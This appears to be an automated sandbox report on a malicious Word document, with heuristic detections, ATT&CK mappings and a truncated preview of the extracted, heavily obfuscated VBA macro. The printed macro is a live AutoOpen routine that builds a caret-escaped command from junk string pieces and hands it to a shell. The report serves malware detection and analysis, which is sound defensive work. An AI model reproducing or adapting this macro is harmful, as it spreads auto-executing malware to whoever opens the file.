Verdict: MALICIOUS (risk score 202)

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1059 Command and Scripting Interpreter
- T1204.002 Malicious File
The sample is a malicious Office document containing a VBA macro. The 'AutoOpen' macro is present and the 'Shell()' function is called, indicating an attempt to execute arbitrary code. The macro is likely responsible for downloading and executing a second-stage payload, though the exact mechanism is truncated.
Heuristics (6)

- ClamAV: Doc.Malware.00536d-6697203-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.00536d-6697203-0
- VBA macros detected (medium, OLE_VBA_MACROS, 2 related findings): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas (SHA-256: 70fbf46ee6a8f40c8ab42567e959c7fae2c7b01dd2d636de737ebab5d4d20994) | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 276331 bytes |
Preview script (first 1,000 lines of the extracted script, shown truncated):

```vba
Attribute VB_Name = "iULVCpNAj"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
Dim fQcYPM(2)
fQcYPM(0) = Left(FWFCaa + qOtpTfkIDPztaVohIDbiY + aKHSVtDE, 297) + MidB(sIzfT + zvafBUCRdqOkZFZBU + voKzkp, 294, 185)
fQcYPM(1) = MidB(qVbJUuJ + TcaOBriHuGRQfbzDjimHA + KtbELQ, 203, 422) + Right(VaJGCifP + ZqzJiZKUjVajpjijpH + iiLLwi, 928)
Dim VbDHI(2)
VbDHI(0) = MidB(rMZMLVvG + qwhBRMsCOuDkBnHBnX + iPrci, 193, 583) + Left(GiYinHDl + GBzocXIioFYfmlaNii + uzFdE, 304) + Right(PvIzE + OEABvPuwlljVdYiqDqWuY + kpcWp, 773) + MidB(LIhjc + PHrTfKardPOdksKtfFFb + NLSPbwFv, 64, 518)
VbDHI(1) = MidB(FMsJz + aatZSwFXPuKfvWSbKiJS + cHWzA, 422, 138) + Left(VXUlAQW + jIQkHjtCWfPQHTriZitnvw + wNHLoCml, 339)
Dim znDGTl(2)
znDGTl(0) = MidB(FPBUKZ + nnUUnkvjuLqMBWwruW + CLdUjw, 855, 947) + MidB(AwwwY + DHZZZtatzzNfLORIJMA + zZoLfXEw, 826, 488)
znDGTl(1) = Right(CzcRXt + ujDIVnjiwFCHlcuvWvz + CPIOp, 828) + Mid(LCtNVj + nZiuUnHQcMczTBvGFiVp + mrFsO, 596, 470) + Left(iVRbo + sqNiKsBwAaaSjJki + XJzoX, 869) + MidB(dlHrwmi + zQwEuOEwrPlIrGUhQpm + VVOSi, 768, 507)
Dim cDkTR(1)
cDkTR(0) = MidB(spfhJzMT + zWzRUhsQRYqUOZQqTHUKd + dqZiRZ, 690, 55) + Right(TEIVr + COBVRQXvdcrVXHEC + zzGRhO, 560)
Dim RzrMR(2)
RzrMR(0) = MidB(IZfnPcP + iHzHNcvZEXqWpMEdzGowAJk + QXMqLj, 84, 609) + MidB(GoDRfN + lkTjOolppLwzcTJrhiq + oihpvpJ, 675, 139) + Left(ZBjIYEZr + SYdUcIVMIvwmHvqAfcr + tZcBTcE, 979) + Mid(WGDUS + NuODaPlYIjqjraaDfUBkDw + YdDaXT, 837, 281)
RzrMR(1) = Left(aTJqc + VImVvIuOBTMGzpMu + LXrcimZ, 146) + Mid(rzQioqEd + jJRXClzUUdiolJsQVimUMc + dSHljZOB, 51, 101) + MidB(smFlZLI + YCvLNzVoFupsWBOJakGjaRY + AuBTCO, 98, 296) + MidB(WZtGNz + AQDXrQzuRWVuoQuDbmdRmD + jjdsjA, 616, 463)
Dim OkRzz(1)
OkRzz(0) = Right(sqDBVtUt + qRwMENriYAmPfRtGoUIqn + iamcAUSI, 956) + MidB(vJXdGPEu + YktPbmLhbJoFFGYfTG + jjjjL, 278, 880)
swiCqfBjh (KeyString(owTuRWl + BhYvR + 10 + 8 + 3 + 12 + 34 + MBBjjKf + fWNJjX) + wUfMuOI + HskKjtf + KeyString(uGLwdS + mzXATdH + 11 + 10 + 4 + 14 + 38 + zBOSmsiA + pGvcinP) + mcbUhiLkzvp + UlXEPWHM + LFLGvVI + BMQfhJoT + LLAzPC + ToRwRGcqdN + Dkrzimi + bHUYprjjC + jUKWa + qAEBiwdG + AFsiUGmEVQ + wpQjilZVz + hiVHPYFCp + uDuiGKqp + GzoujqsArY + HbXwTL + vujzlulQMhH + icNww + YKqsNZ + DQhiG)
Dim fVMDLu(1)
fVMDLu(0) = MidB(cVjUunz + LMEZwlXUJBofdTOzriCbrW + znXIO, 330, 956) + Right(nWjkpj + MrwsMGiAbMIkMaahI + XijuatzP, 39) + MidB(rffqTk + zOplooaTJOBWkZLSfkLl + kthXVH, 809, 6) + Right(YhwsG + cFntBGFcHSBIQUDutww + BHjAmR, 370)
Dim GjnPEL(1)
GjnPEL(0) = MidB(psEMdfH + dzsGPZvlRjmiMWPP + svNYjAz, 194, 852) + Left(wCKYQ + KbTTuNuAazHQsfpihfYL + ziomzFwi, 462) + Mid(KZBzdi + KlBJSNWlGLmPujFOhUD + oOfLAiDw, 114, 730) + Mid(zUWZZ + cMSBbGQYUkFGMDiOWGC + dHSwOjo, 151, 723)
Dim PAIjPm(2)
PAIjPm(0) = Right(bKfrDAqn + WjTWMtzNCRbBcfNkFifEUP + iiFNdsS, 686) + Right(soPhRY + zICMMECjmrcwHQTHpo + tGQCZVY, 243)
PAIjPm(1) = MidB(wPZiWRA + IfsvblJQwQckJFvBDh + kqBsEh, 895, 26) + Left(NbDAL + QRHOqJzAVQVtzGIFZs + WzJXWo, 420)
End Sub
Attribute VB_Name = "KijmWjmbLtz"
Function mcbUhiLkzvp()
KipaNFsin = "d " + CStr(Chr(2 + 8 + 2 + 6 + 29)) + "V" + ":" + CStr(Chr(2 + 8 + 2 + 6 + 29)) + "C" + CStr(Chr(1 + 5 + 1 + 4 + 23)) + "s" + "^" + "e^" + "t " + ";" + "^$" + "="
HQTnNGA = "^3" + "0" + "1^" + " ^" + "30" + "9" + "^" + " " + "^" + "0^" + "5" + "1"
ASDTnDDVH = "^ " + "5" + "^1" + "9" + " " + "^5" + "91" + "^ " + "^1"
Dim ifVPwB(2)
ifVPwB(0) = MidB(OsoIn + oiaYtlBZEcwzjpkcA + sNWjS, 651, 544) + Right(SwCJc + FjwdvKqSGPJzdifpN + tDZdz, 195)
ifVPwB(1) = Right(nWjUftD + itfNMSwhISTiStqtDSL + kTsZisR, 504) + Right(HUWwhk + RBwPJjzlCKvuEdsatRo + jMfRvuJJ, 943) + Left(HiUJIbcG + oWlkSVJNOdLEfwHrtAwIc + IiSRph, 535) + MidB(puhdYUzj + wapNEwPVPpOIMFrwZwjc + JwiSZ, 25, 285)
Dim RqMtn(1)
RqMtn(0) = Right(YJkBqtNf + XuSuzjXOOdWVmDUwOzUc + HZEbPR, 910) + Left(FwdaTHpD + VBnwwWiAZnDSYVpOwziGi + rltpZ, 909)
D ... (truncated)
```